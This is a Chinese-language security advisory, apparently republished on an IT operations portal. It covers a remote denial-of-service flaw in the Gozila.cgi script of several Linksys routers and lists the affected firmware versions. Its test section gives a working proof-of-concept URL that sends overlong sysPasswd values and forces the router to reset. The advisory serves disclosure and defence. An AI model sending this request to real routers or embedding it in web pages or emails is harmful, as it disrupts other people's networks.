IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

多种Linksys路由器Gozila.cgi远程拒绝服务漏洞

2005年08月10日
/


信息提供:

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

远程拒绝服务漏洞

攻击类型:

远程攻击

发布日期:

2004-06-03

更新日期:

2004-06-08

受影响系统:

Linksys EtherFast BEFSR41 Router 1.44
Linksys EtherFast BEFSR41 Router 1.43.3
Linksys EtherFast BEFSR41 Router 1.43
Linksys EtherFast BEFSR41 Router 1.42.7
Linksys EtherFast BEFSR41 Router 1.42.3
Linksys EtherFast BEFSR41 Router 1.41
Linksys EtherFast BEFSR41 Router 1.40.2
Linksys EtherFast BEFSR41 Router 1.39
Linksys EtherFast BEFSR41 Router 1.38
Linksys EtherFast BEFSR41 Router 1.37
Linksys EtherFast BEFSR41 Router 1.36
Linksys EtherFast BEFSR41 Router 1.35
Linksys EtherFast BEFSR11 Router 1.44
Linksys EtherFast BEFSR11 Router 1.43.3
Linksys EtherFast BEFSR11 Router 1.43
Linksys EtherFast BEFSR11 Router 1.42.7
Linksys EtherFast BEFSR11 Router 1.42.3
Linksys EtherFast BEFSR11 Router 1.41
Linksys EtherFast BEFSR11 Router 1.40.2
Linksys EtherFast BEFSRU31 Router 1.44
Linksys EtherFast BEFSRU31 Router 1.43.3
Linksys EtherFast BEFSRU31 Router 1.43
Linksys EtherFast BEFSRU31 Router 1.42.7
Linksys EtherFast BEFSRU31 Router 1.42.3
Linksys EtherFast BEFSRU31 Router 1.41
Linksys EtherFast BEFSRU31 Router 1.40.2
Linksys BEFSX41 1.45.3
Linksys BEFSX41 1.44.3
Linksys BEFSX41 1.44
Linksys BEFSX41 1.43.4
Linksys BEFSX41 1.43.3
Linksys BEFSX41 1.43
Linksys BEFSX41 1.42.7

安全系统:

漏洞报告人:

b0f

漏洞描述:

BUGTRAQ  ID: 10453
Linksys拥有多种网络设备产品线。
多种Linksys路由器包含的Gozila.cgi脚本未能正确处理用户提交的参数,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
如果提交2条超长字符串给Gozila.cgi脚本的sysPasswd和sysPasswdConfirm参数,会导致路由器丢弃所有当前连接,需要使用reset按钮来恢复出厂设置。
攻击者可以构建WEB页或发送恶意HTML形式EMAIL给目标用户。

测试方法:

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

解决方法:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.linksys.com



发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

虚拟局域网快速基本操作入门技巧详解
虚拟局域网快速基本操作入门技巧详解安装虚拟局域网: 安装过程非常简单。您只需按照软件上的提示安装步骤即可完成安...
网络攻击持续横行 路由器防护须升级
网络攻击持续横行 路由器防护须升级上一期文章提到新型态的攻击具备的特性,及现有路由器可以提供的功能之后,让用户...

本类热点